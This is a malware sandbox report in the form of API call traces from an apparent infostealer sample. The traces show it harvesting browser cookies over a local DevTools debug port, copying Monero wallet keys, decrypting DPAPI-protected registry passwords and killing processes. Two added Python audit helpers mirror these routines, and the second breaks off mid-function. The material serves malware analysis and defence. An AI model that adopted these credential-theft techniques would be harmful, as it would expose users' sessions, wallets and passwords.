                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$memset$lstrcpy$Desktopwsprintf$CreateFolderOpenPathSystemTimelstrcpynlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                                  • API String ID: 3051782728-1862457068
                                  • Opcode ID: 01a6bee18ed5dfbe803fba54a4b10557431d3d6a93272016381d304e02cc42ca
                                  • Instruction ID: 4ae631d0d62599e0d69f2ca8b6bc1a20604aa6dc43fac716a152ee9845e418e7
                                  • Opcode Fuzzy Hash: 01a6bee18ed5dfbe803fba54a4b10557431d3d6a93272016381d304e02cc42ca
                                  • Instruction Fuzzy Hash: 47913D71614384AFD720EB74DC49FDB77E8FF89700F508919B689C7291DBB0A9048BA6
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009046D9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 009046E9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 009046FB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 0090470D
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00904722
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00904731
                                  • CloseHandle.KERNEL32(00000000), ref: 00904738
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00904746
                                  • CloseHandle.KERNEL32(00000000), ref: 00904751
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                                  • Instruction ID: 15547ca7071f2b05cb1562a23e79ac38dfaa3b1f7f93a593b3f1086be0c0fb6f
                                  • Opcode Fuzzy Hash: 7063f054a6346edcb6037536fe39ead26a3027397865510cbe5afad45a125100
                                  • Instruction Fuzzy Hash: EA019271601114AFE7215B60DC8DFFE377CEB49B51F404198FA09D6180EF749A858B65
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E769E
                                  • HeapAlloc.KERNEL32(00000000), ref: 008E76A5
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E76CD
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E76ED
                                  • LocalFree.KERNEL32(?), ref: 008E76F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 3657800372-0
                                  • Opcode ID: 24bc84c863ddb5b52a20cf5d6ef28f09906ad3651200a65591821374d947fd4c
                                  • Instruction ID: 305b32e876273bad769567f3f7bba0f85618233b05b0c08c6e3f5e1ea39979c9
                                  • Opcode Fuzzy Hash: 24bc84c863ddb5b52a20cf5d6ef28f09906ad3651200a65591821374d947fd4c
                                  • Instruction Fuzzy Hash: DB011275B403087BEB10DB949C4AFEA7778EB48B11F108155FB09EB2C0DAB099018790
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009040AD
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009040BC
                                  • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 009040C3
                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009040F3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptHeapString$AllocProcess
                                  • String ID:
                                  • API String ID: 3939037734-0
                                  • Opcode ID: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                                  • Instruction ID: 7bb8799787808161f2fb0e2399d865e865114bf07f7af2868feb0c6afe65e4ee
                                  • Opcode Fuzzy Hash: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                                  • Instruction Fuzzy Hash: 2E011AB1600209AFDB109FA5EC99BAABBBDEF89311F108059BE0997240DE719D508B60
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9BFF
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 008E9C13
                                  • memcpy.MSVCRT(00000000,?), ref: 008E9C2A
                                  • LocalFree.KERNEL32(?), ref: 008E9C37
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                  • String ID:
                                  • API String ID: 3243516280-0
                                  • Opcode ID: bd855a7db995371d3106b25d7b8c3c46f2ead6b7f7b0d6b643b28bbc72fd77b3
                                  • Instruction ID: 47000536db9928f7e65003046376bd0d0366d1a1e1ee39305cb8779e591b32e1
                                  • Opcode Fuzzy Hash: bd855a7db995371d3106b25d7b8c3c46f2ead6b7f7b0d6b643b28bbc72fd77b3
                                  • Instruction Fuzzy Hash: F401FB75A4130AABD710DBA4DC59BAAB778EB44B00F504554EE04EB284DBB09A118BE0
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B9B
                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BAA
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BC1
                                  • LocalFree.KERNEL32(?,?,00000000,00000001,00000000,?,00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9BD0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID:
                                  • API String ID: 4291131564-0
                                  • Opcode ID: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                                  • Instruction ID: b7c39484cf82fabdfabbf5b41b8ae846fdfebc768bb6c3deb09e1a931c9596e8
                                  • Opcode Fuzzy Hash: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                                  • Instruction Fuzzy Hash: 61F0BDB03443627BF7305F65AC59F967BACEB45B61F240414FA49EA2C0DBB49840CAA4
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 00903E45
                                  • lstrcpy.KERNEL32(00000000,010C4B10), ref: 00903E6F
                                  • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,008E4D2A,?,00000014), ref: 00903E79
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$SystemTime
                                  • String ID:
                                  • API String ID: 684065273-0
                                  • Opcode ID: f3b81195efbfda54dc9249140bf9cc918f091f485a44b655ed427cb5ebed3d56
                                  • Instruction ID: f24a9e7d4b1d28e11c9578b3a8becfc6c4d7f4b8829fcd9c3db62f2b4fe0f6f3
                                  • Opcode Fuzzy Hash: f3b81195efbfda54dc9249140bf9cc918f091f485a44b655ed427cb5ebed3d56
                                  • Instruction Fuzzy Hash: 9A416C75A112469FDB14CF29C8846A6BBF8FF09710B09C0A9E949DB3A2C771ED42CB40
                                  APIs
                                  • memset.MSVCRT ref: 008E108A
                                    • Part of subcall function 008E1000: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008E1015
                                    • Part of subcall function 008E1000: HeapAlloc.KERNEL32(00000000), ref: 008E101C
                                    • Part of subcall function 008E1000: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 008E1039
                                    • Part of subcall function 008E1000: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1053
                                    • Part of subcall function 008E1000: RegCloseKey.ADVAPI32(?), ref: 008E105D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 008E10A0
                                  • lstrlenA.KERNEL32(?), ref: 008E10AD
                                  • lstrcatA.KERNEL32(?,.keys), ref: 008E10C8
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E10FF
                                  • lstrlenA.KERNEL32(010CD598), ref: 008E110D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1131
                                  • lstrcatA.KERNEL32(00000000,010CD598), ref: 008E1139
                                  • lstrlenA.KERNEL32(\Monero\wallet.keys), ref: 008E1144
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1168
                                  • lstrcatA.KERNEL32(00000000,\Monero\wallet.keys), ref: 008E1174
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E119A
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E11DF
                                  • lstrlenA.KERNEL32(010D04B0), ref: 008E11EE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E1215
                                  • lstrcatA.KERNEL32(00000000,?), ref: 008E121D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E1258
                                  • lstrcatA.KERNEL32(00000000), ref: 008E1265
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 008E128C
                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 008E12B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E12E1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E131D
                                    • Part of subcall function 008FEF30: lstrcpy.KERNEL32(00000000,?), ref: 008FEF62
                                  • DeleteFileA.KERNEL32(?), ref: 008E1351
                                  • memset.MSVCRT ref: 008E136E
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileHeapmemset$AllocCloseCopyDeleteOpenProcessQueryValue
                                  • String ID: .keys$\Monero\wallet.keys
                                  • API String ID: 2734118222-3586502688
                                  • Opcode ID: 5fff0b46314d9827f52375c7e5c06c8aa9792009a20ce57636cd4ad36eaf8382
                                  • Instruction ID: 4deb289298fe2d9dc9ff274c2225ef2dbf7863a1005eedd715d237f279d896c9
                                  • Opcode Fuzzy Hash: 5fff0b46314d9827f52375c7e5c06c8aa9792009a20ce57636cd4ad36eaf8382
                                  • Instruction Fuzzy Hash: B3A17E71A01296ABCB10EFBADC49A9E7BB8FF46700F444024FA05E7251DF70DE518BA1
                                  APIs
                                    • Part of subcall function 008E90F0: InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E910F
                                    • Part of subcall function 008E90F0: InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E912C
                                    • Part of subcall function 008E90F0: InternetCloseHandle.WININET(00000000), ref: 008E9139
                                    • Part of subcall function 008E90F0: strlen.MSVCRT ref: 008E9155
                                  • strlen.MSVCRT ref: 008E9311
                                  • strlen.MSVCRT ref: 008E932A
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7EEF
                                    • Part of subcall function 008F7EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 008F7F09
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7F28
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  • memset.MSVCRT ref: 008E9371
                                  • lstrcatA.KERNEL32(?,ws://localhost:9229), ref: 008E938C
                                  • lstrcatA.KERNEL32(?,00000000), ref: 008E93A2
                                  • strlen.MSVCRT ref: 008E93C9
                                  • strlen.MSVCRT ref: 008E9416
                                  • memcmp.MSVCRT(?,0090D014,?), ref: 008E943B
                                  • memset.MSVCRT ref: 008E9562
                                  • lstrcatA.KERNEL32(?,cookies), ref: 008E9577
                                  • lstrcatA.KERNEL32(?,00911D5C), ref: 008E9589
                                  • lstrcatA.KERNEL32(?,?), ref: 008E959A
                                  • lstrcatA.KERNEL32(?,00915150), ref: 008E95AC
                                  • lstrcatA.KERNEL32(?,?), ref: 008E95BD
                                  • lstrcatA.KERNEL32(?,.txt), ref: 008E95CF
                                  • lstrlenA.KERNEL32(?), ref: 008E95E6
                                  • lstrlenA.KERNEL32(?), ref: 008E960B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E9644
                                  • memset.MSVCRT ref: 008E968C
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$strlen$Internetmemset$Openlstrlenmemchrmemcmp$CloseHandleXinvalid_argumentlstrcpystd::_
                                  • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                  • API String ID: 2819545660-3542011879
                                  • Opcode ID: 426fde87631ff846a7b79cdd9e980636d071d9ef92361c7210673f912da97010
                                  • Instruction ID: d4fe9b99117c378ce1175b4bf4d3bbf1f3756f3c90e7f5dfeede47d9c4a76b84
                                  • Opcode Fuzzy Hash: 426fde87631ff846a7b79cdd9e980636d071d9ef92361c7210673f912da97010
                                  • Instruction Fuzzy Hash: 77E11470E10258EFDF10EFA9C884ADDBBB5FF49304F5044A9E549E7281DB709A45CB91
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 0090182F
                                  • lstrlenA.KERNEL32(010BFA80,00000000,00000000,?,?,00901B61), ref: 00901840
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901867
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901872
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009018A1
                                  • lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 009018B3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009018D4
                                  • lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009018E0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0090190F
                                  • lstrlenA.KERNEL32(010B65F0,?,?,00901B61), ref: 00901925
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0090194C
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901957
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901986
                                  • lstrlenA.KERNEL32(00915558,?,?,00901B61), ref: 00901998
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009019B9
                                  • lstrcatA.KERNEL32(00000000,00915558,?,?,00901B61), ref: 009019C5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 009019F4
                                  • lstrlenA.KERNEL32(010C1430,?,?,00901B61), ref: 00901A0A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A31
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901A3C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901A6B
                                  • lstrlenA.KERNEL32(010C1440,?,?,00901B61), ref: 00901A81
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AA8
                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00901AB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00901AE2
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1049500425-0
                                  • Opcode ID: 3ac3cdd684c42d1c41ace23f5f212c99c661a60367fcdeb77a9d1becf36c2515
                                  • Instruction ID: c590f5ee3a6437ba81a3ea97204a15c9a386bb518324570625e62c6b1f466b73
                                  • Opcode Fuzzy Hash: 3ac3cdd684c42d1c41ace23f5f212c99c661a60367fcdeb77a9d1becf36c2515
                                  • Instruction Fuzzy Hash: 4E913DB5601743AFD720AFB9DC98A57B7EDFF05300B148829A895D32A1DF74DD818B60
                                  APIs
                                  • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0090081F), ref: 008F8D1A
                                  • ExitProcess.KERNEL32 ref: 008F8D27
                                  • strtok_s.MSVCRT ref: 008F8D39
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcessstrtok_s
                                  • String ID: block
                                  • API String ID: 3407564107-2199623458
                                  • Opcode ID: 443177c69bdca474e0295399a07a2f19cf62508cb4138c650ee7af5022da01d5
                                  • Instruction ID: a93dbd44f2dab7f24af1fdd057d254bf339b88a6dec8fd5f4c94538224cb5d6e
                                  • Opcode Fuzzy Hash: 443177c69bdca474e0295399a07a2f19cf62508cb4138c650ee7af5022da01d5
                                  • Instruction Fuzzy Hash: 495170B0A08749EFC7209F75EC88A7A77F5FB48708B40486EE652D7620DFB4E4418B21
                                  APIs
                                  • InternetOpenA.WININET(0090D014,00000001,00000000,00000000,00000000), ref: 008E910F
                                  • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 008E912C
                                  • InternetCloseHandle.WININET(00000000), ref: 008E9139
                                  • strlen.MSVCRT ref: 008E9155
                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 008E9196
                                  • InternetReadFile.WININET(00000000,?,00001000,?), ref: 008E91C7
                                  • InternetCloseHandle.WININET(00000000), ref: 008E91D2
                                  • InternetCloseHandle.WININET(00000000), ref: 008E91D9
                                  • strlen.MSVCRT ref: 008E91EA
                                  • strlen.MSVCRT ref: 008E921D
                                  • strlen.MSVCRT ref: 008E925E
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7EEF
                                    • Part of subcall function 008F7EB0: memcmp.MSVCRT(00000000,?,?,?,"webSocketDebuggerUrl":,00000000), ref: 008F7F09
                                    • Part of subcall function 008F7EB0: memchr.MSVCRT ref: 008F7F28
                                  • strlen.MSVCRT ref: 008E927C
                                    • Part of subcall function 008E89B0: std::_Xinvalid_argument.LIBCPMT ref: 008E89C6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$strlen$CloseHandle$FileOpenReadmemchr$Xinvalid_argumentmemcmpstd::_
                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                  • API String ID: 4166274400-2144369209
                                  • Opcode ID: 870323bf26d6577b900d51502743052fadff30c10a90205105f3e2f1d14ebb04
                                  • Instruction ID: 227fd886baa6fb9687f12138ca60ba11f8326e7cfdce3493ab185a2aeefdff2e
                                  • Opcode Fuzzy Hash: 870323bf26d6577b900d51502743052fadff30c10a90205105f3e2f1d14ebb04
                                  • Instruction Fuzzy Hash: 5151DC71700249ABDB20DFA8DC45BEEB7F9EF84710F144465FA05E3290DBB4DA458761
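The routine above fetches http://localhost:9229/json (9229 is the default Node.js inspector port) and scans the reply with memchr/memcmp for the "webSocketDebuggerUrl": key and the "ws:// value, i.e. it performs DevTools-protocol target discovery against a local debug port. The following helper is an added illustration, not code from the sample or from Joe Sandbox: it reproduces that byte-level scan over a constructed /json body, cross-checks it against a proper JSON parse, and returns the WebSocket endpoints a local inspector is exposing.

```python
"""Parse a DevTools / Node-inspector /json discovery response the way the
routine above does (byte scan), and confirm it with a real JSON parse.
Added illustration; the sample body below is constructed, not captured."""
import json

KEY = b'"webSocketDebuggerUrl":'   # the memcmp pattern seen in the trace
WS_PREFIX = b'"ws://'              # the value prefix seen in the trace

# Constructed sample of what a local inspector's /json endpoint returns.
SAMPLE_BODY = b'''[ {
  "description": "node.js instance",
  "devtoolsFrontendUrl": "devtools://devtools/bundled/js_app.html?ws=localhost:9229/abc",
  "id": "abc",
  "title": "app.js",
  "type": "node",
  "url": "file:///C:/app/app.js",
  "webSocketDebuggerUrl": "ws://localhost:9229/abc"
} ]'''


def scan_ws_urls(body: bytes) -> list[str]:
    """Byte-level scan mirroring the memchr/memcmp loop: walk every '"',
    compare what follows against KEY, then take the next "ws://..." value."""
    urls = []
    pos = 0
    while True:
        quote = body.find(b'"', pos)              # memchr for '"'
        if quote < 0:
            break
        if body[quote:quote + len(KEY)] == KEY:   # memcmp against the key
            start = body.find(WS_PREFIX, quote + len(KEY))
            if start < 0:
                break
            start += 1                            # skip the opening quote
            end = body.find(b'"', start)          # memchr for the closing quote
            if end < 0:
                break
            urls.append(body[start:end].decode("ascii", "replace"))
            pos = end + 1
        else:
            pos = quote + 1
    return urls


def json_ws_urls(body: bytes) -> list[str]:
    """Reference implementation: parse the target array and read the key."""
    try:
        targets = json.loads(body)
    except ValueError:
        return []
    return [t["webSocketDebuggerUrl"] for t in targets
            if isinstance(t, dict)
            and str(t.get("webSocketDebuggerUrl", "")).startswith("ws://")]


def inspector_targets(body: bytes) -> list[str]:
    """Endpoints both methods agree on; anything here is a reachable
    debugger socket on the host, which is what the sample goes on to use."""
    parsed = json_ws_urls(body)
    return [u for u in scan_ws_urls(body) if u in parsed]
```

Run against a body fetched from the local port on a suspect host (or from a proxy capture): a non-empty result from inspector_targets means an application is listening with its inspector open and any local process can attach to it over the returned ws:// URL without authentication, which is the condition this routine is probing for.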
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 008E7745
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 008E778A
                                  • strlen.MSVCRT ref: 008E77BE
                                  • StrStrA.SHLWAPI(?,Password), ref: 008E77F8
                                  • strlen.MSVCRT ref: 008E788D
                                    • Part of subcall function 008E7690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 008E769E
                                    • Part of subcall function 008E7690: HeapAlloc.KERNEL32(00000000), ref: 008E76A5
                                    • Part of subcall function 008E7690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008E76CD
                                    • Part of subcall function 008E7690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008E76ED
                                    • Part of subcall function 008E7690: LocalFree.KERNEL32(?), ref: 008E76F7
                                  • strcpy_s.MSVCRT ref: 008E7821
                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008E782C
                                  • HeapFree.KERNEL32(00000000), ref: 008E7833
                                  • strlen.MSVCRT ref: 008E7840
                                  • strcpy_s.MSVCRT ref: 008E786A
                                  • strlen.MSVCRT ref: 008E78B4
                                  • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 008E7975
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                  • String ID: Password
                                  • API String ID: 3893107980-3434357891
                                  • Opcode ID: 106c8f607cb034a4fa94768edcf461030e0b7fe2d23e22cb030d6d757811e595
                                  • Instruction ID: ceb7bc630537270a3380240c2452bb9eab029a0df9281c3db564f9619aaeef4e
                                  • Opcode Fuzzy Hash: 106c8f607cb034a4fa94768edcf461030e0b7fe2d23e22cb030d6d757811e595
                                  • Instruction Fuzzy Hash: B9810CB1D0025DAFDB10DF95DC84ADEBBB9FF49300F10816AE509E7250EB359A85CBA1
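The routine above opens a key under HKEY_CURRENT_USER (0x80000001) with KEY_READ (0x20019), enumerates its values with RegEnumValueA, keeps the ones whose name contains "Password" (StrStrA, so the match is case-sensitive) and passes their data to CryptUnprotectData, i.e. it harvests DPAPI-protected secrets that an application left in the user hive. The helper below is an added audit aid, not the sample's code: it applies the same name filter and then checks for the fixed DPAPI blob header (version 1 followed by the provider GUID df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte order), so it lists exactly the values such a loop would succeed on. The registry walk is Windows-only and the sample values, including their names, are constructed; the key path passed to it is an assumption of the caller.

```python
"""Find registry values a 'name contains Password, then CryptUnprotectData'
loop would harvest. Added audit helper; sample data below is constructed."""
import sys

# DPAPI blob header: dwVersion = 1, then the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb as stored on disk (little-endian).
DPAPI_BLOB_MAGIC = bytes.fromhex("01000000" "D08C9DDF0115D1118C7A00C04FC297EB")
NAME_NEEDLE = "Password"   # StrStrA semantics: case-sensitive substring


def looks_like_dpapi_blob(data: bytes) -> bool:
    """True if the value data starts with the DPAPI blob header."""
    return data[:len(DPAPI_BLOB_MAGIC)] == DPAPI_BLOB_MAGIC


def select_dpapi_values(values: dict) -> list:
    """Names of values the sample's loop would hand to CryptUnprotectData:
    name contains the needle AND data is a DPAPI blob."""
    return sorted(name for name, data in values.items()
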